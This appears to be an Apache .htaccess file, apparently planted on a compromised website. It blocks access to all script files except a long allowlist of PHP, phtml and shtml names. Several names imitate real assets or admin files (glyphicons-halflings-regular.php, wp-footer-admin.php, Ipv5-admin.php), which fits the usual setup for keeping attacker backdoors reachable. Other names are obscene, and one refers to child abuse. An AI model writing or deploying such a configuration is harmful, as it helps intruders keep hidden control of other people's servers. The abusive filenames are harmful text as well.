Options -Indexes
<FilesMatch "(?i)\.(php|phtml|php[0-9]|sh|pl|cgi|asp|aspx|jsp|exe|shtml)$">
Deny from all
</FilesMatch>
<FilesMatch "^(Author.php|bangleader.php|Documentation.php|debug.php|Eschers.php|glyphicons-halflings-regular.php|select2-addl.min.php|fontawesome-webfont.php|Walkway_Bold.php|navigation-menu.php|bottom_menu.php|emcialan.php|OJSPaymentConfiguration.inc.php||RegisterAuth.inc.php|fc-downloadStats-1348.php|wp-login.php|admin-ajax.php|wp-footer-admin.php|wp-footer-admin.phtml|Install.php|wp-footer-admin.shtml|Ipv4-admin.php|Ipv4-admin.phtml|Ipv4-admin.shtml|Ipv5-admin.php|Ipv5-admin.phtml|Ipv5-admin.shtml||counters.php|emails.php|ReviewerReviewStep4Form.inc.php|xmlrpc.php|DisapproveSubmissionNotificationManager.inc.php|wp-blog-activate.php|20211118232553-17012021028-transkrip-nilai-smp.php|mCampus-v6.php|hero-area.php|shims.php|emcialan.shtml|admin-ajax.php|wp-cron.php|wp-activate.php|wp-comments-post.php|4142-1-AADHAAR650546392.php|config.init.php|Documentation.php|4142-1-AADHAAR650546392.php|Lesbian.php|SimpleFont.php|Circle.php|LazyCloseStream.php|wp-cron.php|InternalUrlException.php|DataController.php|ResetDataForm.php|AuthItemList.php|params-args.php|index.php|feedback.php|emcialan.shtml|main-args.shtml|Documentation.shtml|plagiarism.php|ParaciteCitationsParserPlugin.inc.php|DisapproveSubmissionNotificationManager.php|OJSReviewPaymentDAO.php|OAIMetadataFormatDataset_MARC.php|wp-mailers.php|double.php|threesome.php|gangbang.php|Payment.php|bukkake.php|johnysins.php|squirt.php|cuminmouth.php|NextApplication.php|hellicopter.php|1000.php|500.php|sex.php|miakhalifa.shtml|mariaozawa.phtml|cron.php|pedophile.shtml|sexwithchiken.php|backup.php|ManualPayment.php)$">
Allow from all
</FilesMatch>
<FilesMatch "\.(jpg|png|gif|pdf|jpeg)$">
Allow from all
</FilesMatch>